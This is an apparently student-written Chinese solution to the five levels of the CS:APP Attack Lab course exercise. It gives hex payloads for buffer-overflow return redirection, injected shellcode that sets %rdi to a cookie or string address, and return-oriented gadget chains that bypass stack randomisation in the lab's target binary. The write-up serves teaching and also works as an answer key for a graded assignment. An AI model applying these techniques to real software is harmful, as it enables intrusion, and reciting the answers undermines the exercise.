【LittleXi】Attacklab

【LittleXi】Attacklab

Level1

题目大意：利用缓冲区溢出机制，当test函数调用函数getbuf时，不要直接返回到test函数，而是返回到touch1

解题思路：利用缓冲区溢出，我们不断输入字符串，直到填满整个黄色空间，继续输入字符串（touch1的地址），使得getbuf的返回地址被掩盖为touch1，就成功调用touch1了

答案：

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
86 5e 55 55 55 55 00 00 

Level2

题目大意：类似于Level1，同样利用缓冲区溢出机制，当test函数调用函数getbuf时，不要直接返回到test函数，而是返回到touch2，并在返回touch2之前，将touch2的参数修改为cookil

解题思路：利用缓冲区溢出，我们不断输入字符串，直到填满整个黄色空间，继续输入字符串（读入字符串时栈顶rsp的地址rsp），使得getbuf的返回地址被掩盖为rsp的地址，然后执行我们注入的汇编代码使得修改%rdi的值，并ret

到touch2的地址

注意事项:对于rsp的地址可以用gdb调试到栈顶，然后输入 p /x $rsp 即可直接查看rsp的地址，注入代码流程应该是先手写汇编代码，然后利用

• gcc -c example.s

• objdump -d example.o > example.d

  这两条指令得到程序的机器码
  

答案:

48 c7 c7 56 db eb 76 48
b8 ba 5e 55 55 55 55 00
00 50 c3 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 a0 61 55 00 00 00 00

Level3

题目大意：题目意思和Level2大致相同，只是需要给寄存器%rdi的值换为了字符串的地址就行了

解题思路：我们此时需要找到一个位置来存储字符串，不妨就存储在末尾，然后我们调用栈顶地址之后返回string的开始地址就行了

答案:

48 8d 3c 24 48 b8 df 5f 
55 55 55 55 00 00 50 c3 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 a0 61 55 00 00 00 00
37 36 65 62 64 62 35 36 00

Level4

题目大意：这个是第二阶段的题目，在rtarget中将采用栈随机化，和限制可执行区域来阻止攻击，attacker的目的是将cookie传入touch2函数中，然后调用touch2函数

解题思路:可以直接将rtarget反汇编，去rtarget里面去寻找pop %rax和mov %rax %rdi

答案：

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b4 60 55 55 55 55 00 00
56 db eb 76 00 00 00 00
df 60 55 55 55 55 00 00
ba 5e 55 55 55 55 00 00

Level5

题目大意:和Level3一样的，只是不能直接传值

解题思路：可以综合Level3和Level4的操作，先存储%rsp的地址，然后把按%rsp偏移地址后指向的cookie串的地址传给%rdi就行了

答案：

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
34 62 55 55 55 55 00 00
df 60 55 55 55 55 00 00
85 58 55 55 55 55 00 00
30 00 00 00 00 00 00 00
f2 60 55 55 55 55 00 00
df 60 55 55 55 55 00 00
df 5f 55 55 55 55 00 00
37 36 65 62 64 62 35 36 00